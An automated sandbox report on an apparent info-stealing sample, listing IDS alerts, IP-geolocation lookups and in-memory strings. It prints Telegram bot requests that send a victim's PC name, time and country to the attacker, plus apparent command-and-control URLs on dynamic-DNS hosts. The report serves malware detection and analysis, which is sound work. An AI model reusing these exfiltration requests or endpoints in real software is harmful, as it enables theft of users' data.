Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49739 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49720 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49712 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 104.21.32.1:443
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49725 version: TLS 1.0
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E34EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00E34EB5
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic DNS traffic detected: DNS query: api.telegram.org
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 14:33:54 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 14:34:06 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
                  Source: svchost.exe, 00000003.00000003.2198648507.0000000007B20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: svchost.exe, 00000006.00000002.4525232764.000000000531D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: svchost.exe, 00000003.00000002.4524898032.000000000543C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enhZ
                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005446000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: svchost.exe, 00000003.00000002.4527385906.0000000006353000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4527385906.000000000659D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.000000000646D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: svchost.exe, 00000003.00000002.4524898032.0000000005390000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005320000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.00000000053B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.000000000525F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.0000000005287000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
                  Source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4524898032.0000000005320000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4525232764.00000000051F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: svchost.exe, 00000006.00000002.4525232764.00000000051F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
